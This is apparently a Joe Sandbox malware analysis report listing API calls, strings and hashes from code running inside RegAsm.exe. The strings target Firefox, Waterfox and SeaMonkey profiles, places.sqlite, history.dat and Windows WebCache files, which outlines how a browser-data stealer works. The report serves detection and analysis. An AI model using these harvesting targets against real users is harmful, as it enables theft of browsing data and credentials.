                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: BIN
                                                                                • API String ID: 1668488027-1015027815
                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                • API String ID: 4039892925-11920434
                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 4039892925-2068335096
                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 4039892925-3369679110
                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                • API String ID: 3510742995-2641926074
                                                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@CreateErrorFileLast
                                                                                • String ID: |A
                                                                                • API String ID: 4200628931-1717621600
                                                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                • API String ID: 3030842498-1896041820
                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 669240632-0
                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                APIs
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 2925649097-2036018995
                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004087D6
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                • memset.MSVCRT ref: 00408828
                                                                                • memset.MSVCRT ref: 00408840
                                                                                • memset.MSVCRT ref: 00408858
                                                                                • memset.MSVCRT ref: 00408870
                                                                                • memset.MSVCRT ref: 00408888
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2911713577-0
                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Similarity
                                                                                • API ID: HandleModuleProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: $$8
                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                Similarity
                                                                                • API ID: ??3@mallocmemcpy
                                                                                • String ID:
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
